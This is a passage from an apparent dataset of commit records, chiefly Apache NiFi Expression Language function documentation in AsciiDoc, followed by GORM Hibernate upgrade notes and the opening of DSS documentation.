String_# : [.argDesc]#The String to find within the Subject#\n\t- [.argName]#_Replacement_# : [.argDesc]#The value to replace _Search String_ with#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n\n\n.Replace Examples\n|===================================================================\n| Expression | Value\n| `${filename:replace('.', '_')}` | `a brand new filename_txt`\n| `${filename:replace(' ', '.')}` | `a.brand.new.filename.txt`\n| `${filename:replace('XYZ', 'ZZZ')}` | `a brand new filename.txt`\n| `${filename:replace('filename', 'book')}` | `a brand new book.txt`\n|===================================================================\n\n\n\n\n\n[.function]\n=== replaceAll\n\n*Description*: [.description]#The `replaceAll` function takes two String arguments: a Regular Expression (NiFi uses the Java Pattern\n\tsyntax), and a replacement string. The return value is the result of substituting the replacement string for\n\tall patterns within the Subject that match the Regular Expression.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n*Arguments*:\n\n\t- [.argName]#_Regex_# : [.argDesc]#he Regular Expression (in Java syntax) to match in the Subject#\n\t- [.argName]#_Replacement_# : [.argDesc]#The value to use for replacing matches in the Subject. If the _regular expression_\n\t\targument uses Capturing Groups, back references are allowed in the _replacement_.#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n\n\n.replaceAll Examples\n|=======================================================================================\n| Expression | Value\n| `${filename:replaceAll('\\..*', '')}` | `a brand new filename`\n| `${filename:replaceAll('a brand (new)', '$1')}` | `new filename.txt`\n| `${filename:replaceAll('XYZ', 'ZZZ')}` | `a brand new filename.txt`\n| `${filename:replaceAll('brand (new)', 'somewhat $1')}` | `a somewhat new filename.txt`\n|=======================================================================================\n\n\n\n\n\n\n[.function]\n=== replaceNull\n\n*Description*: [.description]#The `replaceNull` function returns the argument if the Subject is null. Otherwise,\n\treturns the Subject.#\n\n*Subject Type*: [.subject]#Any#\n\n*Arguments*:\n\n\t- [.argName]#_Replacement_# : [.argDesc]#The value to return if the Subject is null.#\n\n*Return Type*: [.returnType]#Type of Subject if Subject is not null; else, type of Argument#\n\n*Examples*: If the attribute \"filename\" has the value \"a brand new filename.txt\" and the attribute\n\t\"hello\" does not exist, then the Expression `${filename:replaceNull('abc')}` will return \n\t\"a brand new filename.txt\", while `${hello:replaceNull('abc')}` will return \"abc\".\n\n\n\n\n\n[.function]\n=== length\n\n*Description*: [.description]#Returns the length of the Subject#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the attribute \"filename\" has a value of \"a brand new filename.txt\" and the attribute\n\t\"hello\" does not exist, then the Expression `${filename:length()}` will return 24. `${hello:length()}`\n\twill return 0.\n\n\n\n\n\n\n\n\n[[searching]]\n== Searching\n\nEach of the following functions is used to search its subject for some value.\n\n\n[.function]\n=== startsWith\n\n*Description*: [.description]#Returns `true` if the Subject starts with the String provided as the argument,\n\t`false` otherwise.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to search for#\n\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the Expression\n\t`${filename:startsWith('a brand')}` will return `true`. `${filename:startsWith('A BRAND')}` will\n\treturn `false`. `${filename:toUpper():startsWith('A BRAND')}` returns `true`.\n\n\n\n\n\n[.function]\n=== endsWith\n\n*Description*: [.description]#Returns `true` if the Subject ends with the String provided as the argument,\n\t`false` otherwise.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to search for#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the Expression\n\t`${filename:endsWith('txt')}` will return `true`. `${filename:endsWith('TXT')}` will\n\treturn `false`. `${filename:toUpper():endsWith('TXT')}` returns `true`.\n\n\n\n\n\n[.function]\n=== contains\n\n*Description*: [.description]#Returns `true` if the Subject contains the value of the argument anywhere in the value.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to search for#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the Expression\n\t`${filename:contains('new')}` will return `true`. `${filename:contains('NEW')}` will\n\treturn `false`. `${filename:toUpper():contains('NEW')}` returns `true`.\n\n\n\n\n\n[.function]\n=== find\n\n*Description*: [.description]#Returns `true` if the Subject contains any sequence of characters that matches the\n\tRegular Expression provided by the argument.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_Regex_# : [.argDesc]#The Regular Expression (in the Java Pattern syntax) to match against the Subject#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: \n\nIf the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n\n.find Examples\n|=======================================================================================\n| Expression | Value\n| `${filename:find('a [Bb]rand [Nn]ew')}` | `true`\n| `${filename:find('Brand.*')}` | `false`\n| `${filename:find('brand')}` | `true`\n|=======================================================================================\n\n\n\n\n\n[.function]\n=== matches\n\n*Description*: [.description]#Returns `true` if the Subject exactly matches the Regular Expression provided by the argument.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: \n\n\t- [.argName]#_Regex_# : [.argDesc]#The Regular Expression (in the Java Pattern syntax) to match against the Subject#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: \n\nIf the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n\n.matches Examples\n|=======================================================================================\n| Expression | Value\n| `${filename:matches('a.*txt')}` | `true`\n| `${filename:matches('brand')}` | `false`\n| `${filename:matches('.+brand.+')}` | `true`\n|=======================================================================================\n\n\n\n\n[.function]\n=== indexOf\n\n*Description*: [.description]#Returns the index of the first character in the Subject that matches the String value provided\n\tas an argument. If the argument is found multiple times within the Subject, the value returned is the\n\tstarting index of the *first* occurrence.\n\tIf the argument cannot be found in the Subject, returns `-1`. The index is zero-based. This means that if\n\tthe search string is found at the beginning of the Subject, the value returned will be `0`, not `1`.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to search for in the Subject#\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n\n\n.indexOf Examples\n|===============================================\n| Expression | Value\n| `${filename:indexOf('a.*txt')}` | `-1`\n| `${filename:indexOf('.')}` | `20`\n| `${filename:indexOf('a')}` | `0`\n| `${filename:indexOf(' ')}` | `1`\n|===============================================\n\n\n\n\n[.function]\n=== lastIndexOf\n\n*Description*: [.description]#Returns the index of the first character in the Subject that matches the String value provided\n\tas an argument. If the argument is found multiple times within the Subject, the value returned is the\n\tstarting index of the *last* occurrence.\n\tIf the argument cannot be found in the Subject, returns `-1`. The index is zero-based. This means that if\n\tthe search string is found at the beginning of the Subject, the value returned will be `0`, not `1`.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to search for in the Subject#\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n.lastIndexOf Examples\n|=======================================================================================\n| Expression | Value\n| `${filename:lastIndexOf('a.*txt')}` | `-1`\n| `${filename:lastIndexOf('.')}` | `20`\n| `${filename:lastIndexOf('a')}` | `17`\n| `${filename:lastIndexOf(' ')}` | `11`\n|=======================================================================================\n\n\n\n\n[[numbers]]\n== Mathematical Operations and Numeric Manipulation\n\n\n[.function]\n=== plus\n\n*Description*: [.description]#Adds a numeric value to the Subject. If either the argument or the Subject cannot be\n\tcoerced into a Number, returns `null`.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_Operand_# : [.argDesc]#The value to add to the Subject#\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the \"fileSize\" attribute has a value of 100, then the Expression `${fileSize:plus(1000)}`\n\twill return the value `1100`.\n\n\n\n\n\n[.function]\n=== minus\n\n*Description*: [.description]#Subtracts a numeric value from the Subject.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_Operand_# : [.argDesc]#The value to subtract from the Subject#\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the \"fileSize\" attribute has a value of 100, then the Expression `${fileSize:minus(100)}`\n\twill return the value `0`.\n\n\n\n\n\n[.function]\n=== multiply\n\n*Description*: [.description]#Multiplies a numeric value by the Subject and returns the product.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_Operand_# : [.argDesc]#The value to multiple the Subject by#\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the \"fileSize\" attribute has a value of 100, then the Expression `${fileSize:multiply(1024)}`\n\twill return the value `102400`.\n\n\n\n\n[.function]\n=== divide\n\n*Description*: [.description]#Divides a numeric value by the Subject and returns the result, rounded down to the nearest integer.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_Operand_# : [.argDesc]#The value to add divide the Subject by#\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the \"fileSize\" attribute has a value of 100, then the Expression `${fileSize:divide(12)}`\n\twill return the value `8`.\n\n\n\n\n[.function]\n=== mod\n\n*Description*: [.description]#Performs a modular division of the Subject by the argument. That is, this function will divide\n\tthe Subject by the value of the argument and return not the quotient but rather the remainder.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_Operand_# : [.argDesc]#The value to divide the Subject by#\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the \"fileSize\" attribute has a value of 100, then the Expression `${fileSize:mod(12)}`\n\twill return the value `4`.\n\n\n\n\n\n[.function]\n=== toRadix\n\n*Description*: [.description]#Converts the Subject from a Base 10 number to a different Radix (or number base). An optional\n\tsecond argument can be used to indicate the minimum number of characters to be used. If the converted value\n\thas fewer than this number of characters, the number will be padded with leading zeroes.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_Desired Base_# : [.argDesc]#A Number between 2 and 36 (inclusive)#\n\t- [.argName]#_Padding_# : [.argDesc]#Optional argument that specifies the minimum number of characters in the converted output#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"fileSize\" attributes has a value of 1024, then the following Expressions will yield\n\tthe following results:\n\t\n\n.toRadix Examples\n|=======================================================================================\n| Expression | Value\n| `${fileSize:toRadix(10)}` | `1024`\n| `${fileSize:toRadix(10, 1)}` | `1024`\n| `${fileSize:toRadix(10, 8)}` | `00001024`\n| `${fileSize:toRadix(16)}` | `400`\n| `${fileSize:toRadix(16, 8)}` | `00000400`\n| `${fileSize:toRadix(2)}` | `10000000000`\n| `${fileSize:toRadix(2, 16)}` | `0000010000000000`\n|=======================================================================================\n\n\n\n\n[[dates]]\n== Date Manipulation\n\n\n\n[[format]]\n[.function]\n=== format\n\n*Description*: [.description]#Formats a number as a date\/time according to the format specified by the argument. The argument\n\tmust be a String that is a valid Java SimpleDateFormat format. The Subject is expected to be a Number that\n\trepresents the number of milliseconds since Midnight GMT January 1, 1970.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_format_# : [.argDesc]#The format to use in the Java SimpleDateFormat syntax#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the attribute \"time\" has the value \"1420058163264\", then the following Expressions will yield\n\tthe following results:\n\t\n.format Examples\n|============================================================================\n| Expression | Value\n| `${time:format(\"yyyy\/MM\/dd HH:mm:ss.SSS'Z'\")}` | `2014\/12\/31 15:36:03.264Z`\n| `${time:format(\"yyyy\/MM\/dd\")}` | `2014\/12\/31`\n| `${time:format(\"HH:mm:ss.SSS'Z'\")}` | `15:36:03.264Z`\n| `${time:format(\"2014\")}` | `2014`\n|============================================================================\n\n\n\n\n\n[.function]\n=== toDate\n\n*Description*: [.description]#Converts a String into a Number, based on the format specified by the argument. The argument\n\tmust be a String that is a valid Java SimpleDateFormat syntax. The Subject is expected to be a String\n\tthat is formatted according the argument. The return value is the numbr of milliseconds since \n\tMidnight GMT January 1, 1979.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\t\n\t\t- [.argName]#_format_# : [.argDesc]#The current format to use when parsing the Subject, in the Java SimpleDateFormat syntax.#\n\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the attribute \"year\" has the value \"2014\" and the attribute \"time\" has the value \"2014\/12\/31 15:36:03.264Z\",\n\tthen the Expression `${year:toDate('yyyy')}` will return the number of milliseconds between Midnight GMT on January 1, 1970\n\tand Midnight GMT on January 1, 2014. The Expression `${time:toDate(\"yyyy\/MM\/dd HH:mm:ss.SSS'Z'\")}` will result in the\n\tnumber of milliseconds between Midnight GMT on January 1, 1970 and 15:36:03.264 GMT on December 31, 2014.\n\t\n\tOften, this function is used in conjunction with the <<format>> function to change the format of a date\/time. For example,\n\tif the attribute \"date\" has the value \"12-24-2014\" and we want to change the format to \"2014\/12\/24\", we can do so by\n\tchaining together the two functions: `${date:toDate('MM-dd-yyyy'):format('yyyy\/MM\/dd')}`.\n\n\n\n\n[.function]\n=== now\n\n*Description*: [.description]#The `now` function returns the current date and time as the number of milliseconds since Midnight GMT on\n\tJanuary 1, 1970.#\n\n*Subject Type*: [.subject]#No Subject#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: We can format the current date and time by using the `now` function in conjunction with the <<format>> function:\n\t`${now():format('yyyy\/MM\/dd HH:mm:ss')}`.\n\n\n\n\n\n[[type_cast]]\n== Type Coercion\n\n[.function]\n=== toString\n\n*Description*: [.description]#Coerces the Subject into a String#\n\n*Subject Type*: [.subject]#Any type#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: The Expression `${fileSize:toNumber():toString()}` converts the value of \"fileSize\" attribute to a number and\n\tback to a String.\n\n\n\n\n\n[.function]\n=== toNumber\n\n*Description*: [.description]#Coerces the Subject into a Number#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: The Expression `${fileSize:toNumber()}` converts the String attribute value of \"fileSize\" to a number.\n\n\n\n\n\n\n[[subjectless]]\n== Subjectless Functions\n\nWhile the majority of functions in the Expression Language are called by using the syntax\n`${attributeName:function()}`, there exist a few functions that are not expected to have subjects.\nIn this case, the attribute name is not present. For example, the IP address of the machine can\nbe obtained by using the Expression `${ip()}`. All of the functions in this section are to be called\nwithout a subject. Attempting to call a subjectless function and provide it a subject will result in\nan error when validating the function.\n\n\n[.function]\n=== ip\n\n*Description*: [.description]#Returns the IP address of the machine.#\n\n*Subject Type*: [.subjectless]#No subject#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: The IP address of the machine can be obtained by using the Expresison `${ip()}`.\n\n\n\n\n\n[.function]\n=== hostname\n\n*Description*: [.description]#Returns the Hostname of the machine. An optional argument of type Boolean can be provided\n\tto specify whether or not the Fully Qualified Domain Name should be used. If `false`, or not specified,\n\tthe hostname will not be fully qualified. If the argument is `true` but the fully qualified hostname\n\tcannot be resolved, the simple hostname will be returned.#\n\n*Subject Type*: [.subjectless]#No subject#\n\n*Arguments*:\n\n\t- [.argName]#_Fully Qualified_# : [.argDesc]#Optional parameter that specifies whether or not the hostname should be\n\t\tfully qualified. If not specified, defaults to false.#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: The fully qualified hostname of the machine can be obtained by using the Expression `${hostname(true)}`,\n\twhile the simple hostname can be obtained by using either `${hostname(false)}` or simply `${hostname()}`.\n\n\n\n\n\n[.function]\n=== UUID\n\n*Description*: [.description]#Returns a randomly generated UUID.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: ${UUID()} returns a value similar to de305d54-75b4-431b-adb2-eb6b9e546013\n\n\n\n\n\n[.function]\n=== nextInt\n\n*Description*: [.description]#Returns a one-up value (starting at 0) and increasing over the lifetime of the running instance of NiFi. \n\tThis value is not persisted across restarts and is not guaranteed to be unique across a cluster. \n\tThis value is considered \"one-up\" in that if called multiple times across the NiFi instance, the values will be sequential. \n\tHowever, this counter is shared across all NiFi components, so calling this function multiple times from one Processor will \n\tnot guarantee sequential values within the context of a particular Processor.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the previous value returned by `nextInt` was `5`, the Expression `${nextInt():divide(2)}` obtains the next available \n\tinteger (6) and divides the result by 2, returning a value of `3`.\n\n\n\n\n\n\n[[multi]]\n== Evaluating Multiple Attributes\n\nWhen it becomes necessary to evaluate the same conditions against multiple attributes, this can be accomplished by means of the \n`and` and `or` functions. However, this quickly becomes tedious, error-prone, and difficult to maintain. For this reason, NiFi\nprovides several functions for evaluating the same conditions against groups of attributes at the same time.\n\n\n\n\n[.function]\n=== anyAttribute\n \n*Description*: [.description]#Checks to see if any of the given attributes, match the given condition. This function has no subject and takes one or more\n\targuments that are the names of attributes to which the remainder of the Expression is to be applied. If any of the attributes specified,\n\twhen evaluated against the rest of the Expression, returns a value of `true`, then this function will return `true`. Otherwise, this function\n\twill return `false`.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*:\n\n\t- [.argName]#_Attribute Names_# : [.argDesc]#One or more attribute names to evaluate#\n\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: Given that the \"abc\" attribute contains the value \"hello world\", \"xyz\" contains \"good bye world\", \n\tand \"filename\" contains \"file.txt\" consider the following examples:\n\n.anyAttribute Examples\n|=======================================================================\n| Expression | Value\n| `${anyAttribute(\"abc\", \"xyz\"):contains(\"bye\")}` | `true`\n| `${anyAttribute(\"filename\",\"xyz\"):toUpper():contains(\"e\")}` | `false`\n|=======================================================================\n\n\n\n\n[.function]\n=== allAttributes\n\n*Description*: [.description]#Checks to see if any of the given attributes, match the given condition. This function has no subject and takes one or more\n\targuments that are the names of attributes to which the remainder of the Expression is to be applied. If all of the attributes specified,\n\twhen evaluated against the rest of the Expression, returns a value of `true`, then this function will return `true`. Otherwise, this function\n\twill return `false`.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*: \n\n\t- [.argName]#_Attribute Names_# : [.argDesc]#One or more attribute names to evaluate#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: Given that the \"abc\" attribute contains the value \"hello world\", \"xyz\" contains \"good bye world\", \n\tand \"filename\" contains \"file.txt\" consider the following examples:\n\n.allAttributes Example\n|=============================================================================\n| Expression | Value\n| `${allAttributes(\"abc\", \"xyz\"):contains(\"world\")}` | `true`\n| `${allAttributes(\"abc\", \"filename\",\"xyz\"):toUpper():contains(\"e\")}` | `false`\n|=============================================================================\n\n\n\n\n\n[.function]\n=== anyMatchingAttribute\n\n*Description*: [.description]# Checks to see if any of the given attributes, match the given condition. This function has no subject and takes one or more\n\targuments that are Regular Expressions to match against attribute names. Any attribute whose name matches one of the supplied\n\tRegular Expressions will be evaluated against the rest of the Expression. If any of the attributes specified,\n\twhen evaluated against the rest of the Expression, returns a value of `true`, then this function will return `true`. Otherwise, this function\n\twill return `false`.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*:\n\n\t- [.argName]#_Regex_# : [.argDesc]#One or more Regular Expressions (in the Java Pattern syntax) to evaluate against attribute names#\n\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: Given that the \"abc\" attribute contains the value \"hello world\", \"xyz\" contains \"good bye world\", \n\tand \"filename\" contains \"file.txt\" consider the following examples:\n\n.anyMatchingAttribute Example\n|==============================================================\n| Expression | Value\n| `${anyMatchingAttribute(\"[ax].*\"):contains('bye')}` | `true`\n| `${anyMatchingAttribute(\".*\"):isNull()}` | `false`\n|==============================================================\n\n\n\n\n\n[.function]\n=== allMatchingAttributes\n\n*Description*: [.description]# Checks to see if any of the given attributes, match the given condition. This function has no subject and takes one or more\n\targuments that are Regular Expressions to match against attribute names. Any attribute whose name matches one of the supplied\n\tRegular Expressions will be evaluated against the rest of the Expression. If all of the attributes specified,\n\twhen evaluated against the rest of the Expression, return a value of `true`, then this function will return `true`. Otherwise, this function\n\twill return `false`.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n\t- [.argName]#_Regex_# : [.argDesc]#One or more Regular Expressions (in the Java Pattern syntax) to evaluate against attribute names#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: Given that the \"abc\" attribute contains the value \"hello world\", \"xyz\" contains \"good bye world\", \n\tand \"filename\" contains \"file.txt\" consider the following examples:\n\n.anyMatchingAttributes Examples\n|==============================================================\n| Expression | Value\n| `${allMatchingAttributes(\"[ax].*\"):contains(\"world\")}` | `true`\n| `${allMatchingAttributes(\".*\"):isNull()}` | `false`\n| `${allMatchingAttributes(\"f.*\"):count()}` | `1`\n|==============================================================\n\n\n\n\n\n[.function]\n=== anyDelineatedValue\n\n*Description*: [.description]#Splits a String apart according to a delimiter that is provided, and then evaluates each of the values against\n\tthe rest of the Expression. If the Expression, when evaluated against any of the individual values, returns `true`, this\n\tfunction returns `true`. Otherwise, the function returns `false`.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*:\n\n\t- [.argName]#_Delineated Value_# : [.argDesc]#The value that is delineated. This is generally an embedded Expression, \n\t\tthough it does not have to be.#\n\t- [.argName]#_Delimiter_# : [.argDesc]#The value to use to split apart the _delineatedValue_ argument.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: Given that the \"number_list\" attribute contains the value \"1,2,3,4,5\", and the \"word_list\" attribute contains the value \"the,and,or,not\", \n\tconsider the following examples:\n\n.anyDelineatedValue Examples\n|===============================================================================\n| Expression | Value\n| `${anyDelineatedValue(\"${number_list}\", \",\"):contains(\"5\")}` | `true`\n| `${anyDelineatedValue(\"this that and\", \",\"):equals(\"${word_list}\")}` | `false`\n|===============================================================================\n\n\n\n[.function]\n=== allDelineatedValues\n\n*Description*: [.description]#Splits a String apart according to a delimiter that is provided, and then evaluates each of the values against\n\tthe rest of the Expression. If the Expression, when evaluated against all of the individual values, returns `true` in each\n\tcase, then this function returns `true`. Otherwise, the function returns `false`.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*:\n\n\t- [.argName]#_Delineated Value_# : [.argDesc]#The value that is delineated. This is generally \n\t\tan embedded Expression, though it does not have to be.#\n\n\t- [.argName]#_Delimiter_# : [.argDesc]#The value to use to split apart the _delineatedValue_ argument.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: Given that the \"number_list\" attribute contains the value \"1,2,3,4,5\", and the \"word_list\" attribute contains the value \"those,known,or,not\", \n\tconsider the following examples:\n\n.allDelineatedValues Examples\n|===============================================================================\n| Expression | Value\n| `${allDelineatedValues(\"${word_list}\", \",\"):contains(\"o\")}` | `true`\n| `${allDelineatedValues(\"${number_list}\", \",\"):count()}` | `4`\n| `${allDelineatedValues(\"${number_list}\", \",\"):matches(\"[0-9]+\")}` | `true`\n| `${allDelineatedValues(\"${word_list}\", \",\"):matches('e')}` | `false`\n|===============================================================================\n\n\n\n\n[.function]\n=== join\n\n*Description*: [.description]#Aggregate function that concatenates multiple values with the specified delimiter. This function \n\tmay be used only in conjunction with the `allAttributes`, `allMatchingAttributes`, and `allDelineatedValues`\n\tfunctions.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_Delimiter_# : [.argDesc]#The String delimiter to use when joining values#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: Given that the \"abc\" attribute contains the value \"hello world\", \"xyz\" contains \"good bye world\", \n\tand \"filename\" contains \"file.txt\" consider the following examples:\n\n.join Examples\n|=======================================================================================\n| Expression | Value\n| `${allMatchingAttributes(\"[ax].*\"):substringBefore(\" \"):join(\"-\")}` | `hello-good`\n| `${allAttributes(\"abc\", \"xyz\"):join(\" now\")}` | `hello world nowgood bye world now`\n|=======================================================================================\n\n\n\n\n\n\n[.function]\n=== count\n\n*Description*: [.description]#Aggregate function that counts the number of non-null, non-false values returned by the \n\t`allAttributes`, `allMatchingAttributes`, and `allDelineatedValues`. This function \n\tmay be used only in conjunction with the `allAttributes`, `allMatchingAttributes`, and `allDelineatedValues`\n\tfunctions.#\n\n*Subject Type*: [.subject]#Any#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: Given that the \"abc\" attribute contains the value \"hello world\", \"xyz\" contains \"good bye world\", \n\tand \"number_list\" contains \"1,2,3,4,5\" consider the following examples:\n\n.count Examples\n|===========================================================================\n| Expression | Value\n| `${allMatchingAttributes(\"[ax].*\"):substringBefore(\" \"):count()}` | `2`\n| `${allAttributes(\"abc\", \"xyz\"):contains(\"world\"):count()}` | `1`\n| `${allDelineatedValues(${number_list}, \",\"):count()}` | `5`\n| `${allAttributes(\"abc\", \"non-existent-attr\", \"xyz\"):count()}` | `2`\n| `${allMatchingAttributes(\".*\"):length():gt(10):count()}` | `2`\n|===========================================================================\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9301137736e9426263d2fb3d9b9689b02de515de","subject":"upgrade docs","message":"upgrade docs\n","repos":"grails\/gorm-hibernate5","old_file":"docs\/src\/docs\/asciidoc\/introduction\/upgradeNotes.adoc","new_file":"docs\/src\/docs\/asciidoc\/introduction\/upgradeNotes.adoc","new_contents":"==== Changes to Configuration Model\n\nIn preparation for Hibernate 5.2 support the previous \"SessionFactoryBean\" notion has been removed. Now if you wish to customize `SessionFactory` creation you should instead register a custom `org.grails.orm.hibernate.connections.HibernateConnectionSourceFactory` in Spring.\n\n==== IdentityEnumType Handling Changed\n\nPrevious versions of GORM shipped with a `org.grails.orm.hibernate.cfg.IdentityEnumType` class for altering the handling of enums. In order to support different versions of Hibernate 5.x which feature different signatures for the `org.hibernate.usertype.UserType` interface this class has been removed.\n\nIf you wish to obtain the same functionality you need to change your `mapping` block to:\n\n[source,groovy]\n----\nstatic mapping = {\n myEnum enumType:\"identity\"\n}\n----\n\n==== Changes to Support Hibernate 5.2\n\nHibernate 5.2 includes many breaking API changes, in order to support Hibernate 5.2 several classes have been removed or rewritten. Including:\n\n* `org.grails.orm.hibernate.proxy.GroovyAwareJavassistLazyInitializer`\n* `org.grails.orm.hibernate.proxy.GroovyAwareJavassistProxyFactory`\n* `org.grails.orm.hibernate.persister.entity.GroovyAwareJoinedSubclassEntityPersister`\n* `org.grails.orm.hibernate.persister.entity.GroovyAwareSingleTableEntityPersister`\n\nMost of these classes are considered internal, however if you have extended or references these classes you may need to modify your code appropriately.\n\n==== Domain Autowiring Disabled by Default\n\nSpring autowiring of domain instances has been disabled by default because it represents a performance bottleneck. If you are autowiring services into your domain instances you will need to re-enable using the `mapping` block:\n\n[source,groovy]\n----\nstatic mapping = {\n autowire true\n}\n----\n\nNote that if enabled read performance will degrade.\n\n==== Field AccessType by Default\n\nPrevious versions of GORM used property access to read and write values to entities by default. In other words the respective getters and setters were used when reflecting on the instances. GORM 6.1 uses field access by default instead, which means the field is used when reading and writing data via reflection to instances.\n\nIf you wish to continue to use property access this can be configured by altering the default mapping in your configuration:\n\n[source,groovy]\n----\nimport javax.persistence.*\ngrails.gorm.default.mapping = {\n '*'(accessType: AccessType.PROPERTY)\n}\n----","old_contents":"==== Changes to Configuration Model\n\nIn preparation for Hibernate 5.2 support the previous \"SessionFactoryBean\" notion has been removed. Now if you wish to customize `SessionFactory` creation you should instead register a custom `org.grails.orm.hibernate.connections.HibernateConnectionSourceFactory` in Spring.\n\n==== IdentityEnumType Handling Changed\n\nPrevious versions of GORM shipped with a `org.grails.orm.hibernate.cfg.IdentityEnumType` class for altering the handling of enums. In order to support different versions of Hibernate 5.x which feature different signatures for the `org.hibernate.usertype.UserType` interface this class has been removed.\n\nIf you wish to obtain the same functionality you need to change your `mapping` block to:\n\n[source,groovy]\n----\nstatic mapping = {\n myEnum enumType:\"identity\"\n}\n----\n\n==== Changes to Support Hibernate 5.2\n\nHibernate 5.2 includes many breaking API changes, in order to support Hibernate 5.2 several classes have been removed or rewritten. Including:\n\n* `org.grails.orm.hibernate.proxy.GroovyAwareJavassistLazyInitializer`\n* `org.grails.orm.hibernate.proxy.GroovyAwareJavassistProxyFactory`\n* `org.grails.orm.hibernate.persister.entity.GroovyAwareJoinedSubclassEntityPersister`\n* `org.grails.orm.hibernate.persister.entity.GroovyAwareSingleTableEntityPersister`\n\nMost of these classes are considered internal, however if you have extended or references these classes you may need to modify your code appropriately.","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6d390f435cfe3aa248555f95740cffca28e53fcf","subject":"DSS-2468 - JDK 16 support - update documentation","message":"DSS-2468 - JDK 16 support - update documentation\n","repos":"esig\/dss,esig\/dss","old_file":"dss-cookbook\/src\/main\/asciidoc\/dss-documentation.adoc","new_file":"dss-cookbook\/src\/main\/asciidoc\/dss-documentation.adoc","new_contents":":toc: left\n:icons: font\n:icon-set: far\n= Digital Signature Service\n:description: Documentation of the open source project DSS (Digital Signature Service). This project allows producing\/validation of Advanced electronic signatures (AdES).\n:keywords: electronic signature, XAdES, CAdES, PAdES, ASiC, open source, validation\nversion : {dssVersion} - {docdate}\n\n== Introduction\n\n=== Purpose of the 